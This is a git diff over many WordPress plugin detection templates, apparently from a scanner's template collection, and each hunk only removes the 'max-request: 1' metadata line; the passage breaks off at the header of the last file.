@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-listings-and-ads/
metadata:
- max-request: 1
plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-site-kit/
metadata:
- max-request: 1
plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-sitemap-generator/
metadata:
- max-request: 1
plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gtranslate/
metadata:
- max-request: 1
plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gutenberg/
metadata:
- max-request: 1
plugin_namespace: gutenberg
wpscan: https://wpscan.com/plugin/gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/happy-elementor-addons/
metadata:
- max-request: 1
plugin_namespace: happy-elementor-addons
wpscan: https://wpscan.com/plugin/happy-elementor-addons
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
index 2409c6b370..a8eca7b056 100644
--- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
+++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-and-footer-scripts/
metadata:
- max-request: 1
plugin_namespace: header-and-footer-scripts
wpscan: https://wpscan.com/plugin/header-and-footer-scripts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-code-manager/
metadata:
- max-request: 1
plugin_namespace: header-footer-code-manager
wpscan: https://wpscan.com/plugin/header-footer-code-manager
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-elementor/
metadata:
- max-request: 1
plugin_namespace: header-footer-elementor
wpscan: https://wpscan.com/plugin/header-footer-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer/
metadata:
- max-request: 1
plugin_namespace: header-footer
wpscan: https://wpscan.com/plugin/header-footer
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/health-check/
metadata:
- max-request: 1
plugin_namespace: health-check
wpscan: https://wpscan.com/plugin/health-check
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/hello-dolly/
metadata:
- max-request: 1
plugin_namespace: hello-dolly
wpscan: https://wpscan.com/plugin/hello-dolly
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/host-webfonts-local/
metadata:
- max-request: 1
plugin_namespace: host-webfonts-local
wpscan: https://wpscan.com/plugin/host-webfonts-local
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/imagify/
metadata:
- max-request: 1
plugin_namespace: imagify
wpscan: https://wpscan.com/plugin/imagify
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/imsanity/
metadata:
- max-request: 1
plugin_namespace: imsanity
wpscan: https://wpscan.com/plugin/imsanity
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/insert-headers-and-footers/
metadata:
- max-request: 1
plugin_namespace: insert-headers-and-footers
wpscan: https://wpscan.com/plugin/insert-headers-and-footers
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/instagram-feed/
metadata:
- max-request: 1
plugin_namespace: instagram-feed
wpscan: https://wpscan.com/plugin/instagram-feed
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/intuitive-custom-post-order/
metadata:
- max-request: 1
plugin_namespace: intuitive-custom-post-order
wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/iwp-client/
metadata:
- max-request: 1
plugin_namespace: iwp-client
wpscan: https://wpscan.com/plugin/iwp-client
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/jetpack/
metadata:
- max-request: 1
plugin_namespace: jetpack
wpscan: https://wpscan.com/plugin/jetpack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/kadence-blocks/
metadata:
- max-request: 1
plugin_namespace: kadence-blocks
wpscan: https://wpscan.com/plugin/kadence-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/kirki/
metadata:
- max-request: 1
plugin_namespace: kirki
wpscan: https://wpscan.com/plugin/kirki
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/leadin/
metadata:
- max-request: 1
plugin_namespace: leadin
wpscan: https://wpscan.com/plugin/leadin
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts-reloaded/
metadata:
- max-request: 1
plugin_namespace: limit-login-attempts-reloaded
wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts/
metadata:
- max-request: 1
plugin_namespace: limit-login-attempts
wpscan: https://wpscan.com/plugin/limit-login-attempts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/litespeed-cache/
metadata:
- max-request: 1
plugin_namespace: litespeed-cache
wpscan: https://wpscan.com/plugin/litespeed-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loco-translate/
metadata:
- max-request: 1
plugin_namespace: loco-translate
wpscan: https://wpscan.com/plugin/loco-translate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loginizer/
metadata:
- max-request: 1
plugin_namespace: loginizer
wpscan: https://wpscan.com/plugin/loginizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76..6f06b49011 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loginpress/
metadata:
- max-request: 1
plugin_namespace: loginpress
wpscan: https://wpscan.com/plugin/loginpress
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-woocommerce/
metadata:
- max-request: 1
plugin_namespace: mailchimp-for-woocommerce
wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-wp/
metadata:
- max-request: 1
plugin_namespace: mailchimp-for-wp
wpscan: https://wpscan.com/plugin/mailchimp-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailpoet/
metadata:
- max-request: 1
plugin_namespace: mailpoet
wpscan: https://wpscan.com/plugin/mailpoet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/maintenance/
metadata:
- max-request: 1
plugin_namespace: maintenance
wpscan: https://wpscan.com/plugin/maintenance
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mainwp-child/
metadata:
- max-request: 1
plugin_namespace: mainwp-child
wpscan: https://wpscan.com/plugin/mainwp-child
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/malcare-security/
metadata:
- max-request: 1
plugin_namespace: malcare-security
wpscan: https://wpscan.com/plugin/malcare-security
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/megamenu/
metadata:
- max-request: 1
plugin_namespace: megamenu
wpscan: https://wpscan.com/plugin/megamenu
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/members/
metadata:
- max-request: 1
plugin_namespace: members
wpscan: https://wpscan.com/plugin/members
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/meta-box/
metadata:
- max-request: 1
plugin_namespace: meta-box
wpscan: https://wpscan.com/plugin/meta-box
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 8881e23860..8e1cb46cf0 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ml-slider/
metadata:
- max-request: 1
plugin_namespace: ml-slider
wpscan: https://wpscan.com/plugin/ml-slider
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/newsletter/
metadata:
- max-request: 1
plugin_namespace: newsletter
wpscan: https://wpscan.com/plugin/newsletter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/nextend-facebook-connect/
metadata:
- max-request: 1
plugin_namespace: nextend-facebook-connect
wpscan: https://wpscan.com/plugin/nextend-facebook-connect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/nextgen-gallery/
metadata:
- max-request: 1
plugin_namespace: nextgen-gallery
wpscan: https://wpscan.com/plugin/nextgen-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ninja-forms/
metadata:
- max-request: 1
plugin_namespace: ninja-forms
wpscan: https://wpscan.com/plugin/ninja-forms
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ocean-extra/
metadata:
- max-request: 1
plugin_namespace: ocean-extra
wpscan: https://wpscan.com/plugin/ocean-extra
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/official-facebook-pixel/
metadata:
- max-request: 1
plugin_namespace: official-facebook-pixel
wpscan: https://wpscan.com/plugin/official-facebook-pixel
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/one-click-demo-import/
metadata:
- max-request: 1
plugin_namespace: one-click-demo-import
wpscan: https://wpscan.com/plugin/one-click-demo-import
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/optinmonster/
metadata:
- max-request: 1
plugin_namespace: optinmonster
wpscan: https://wpscan.com/plugin/optinmonster
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 0bc823830f..c45ef4bf89 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/otter-blocks/
metadata:
- max-request: 1
plugin_namespace: otter-blocks
wpscan: https://wpscan.com/plugin/otter-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/password-protected/
metadata:
- max-request: 1
plugin_namespace: password-protected
wpscan: https://wpscan.com/plugin/password-protected
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pdf-embedder/
metadata:
- max-request: 1
plugin_namespace: pdf-embedder
wpscan: https://wpscan.com/plugin/pdf-embedder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml
index 7fbeea5917..a224d85727 100644
--- a/http/technologies/wordpress/plugins/photo-gallery.yaml
+++ b/http/technologies/wordpress/plugins/photo-gallery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/photo-gallery/
metadata:
- max-request: 1
plugin_namespace: photo-gallery
wpscan: https://wpscan.com/plugin/photo-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pixelyoursite/
metadata:
- max-request: 1
plugin_namespace: pixelyoursite
wpscan: https://wpscan.com/plugin/pixelyoursite
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/polylang/
metadata:
- max-request: 1
plugin_namespace: polylang
wpscan: https://wpscan.com/plugin/polylang
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/popup-builder/
metadata:
- max-request: 1
plugin_namespace: popup-builder
wpscan: https://wpscan.com/plugin/popup-builder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/popup-maker/
metadata:
- max-request: 1
plugin_namespace: popup-maker
wpscan: https://wpscan.com/plugin/popup-maker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/post-smtp/
metadata:
- max-request: 1
plugin_namespace: post-smtp
wpscan: https://wpscan.com/plugin/post-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index 829edad042..56d2e4efcd 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/post-types-order/
metadata:
- max-request: 1
plugin_namespace: post-types-order
wpscan: https://wpscan.com/plugin/post-types-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
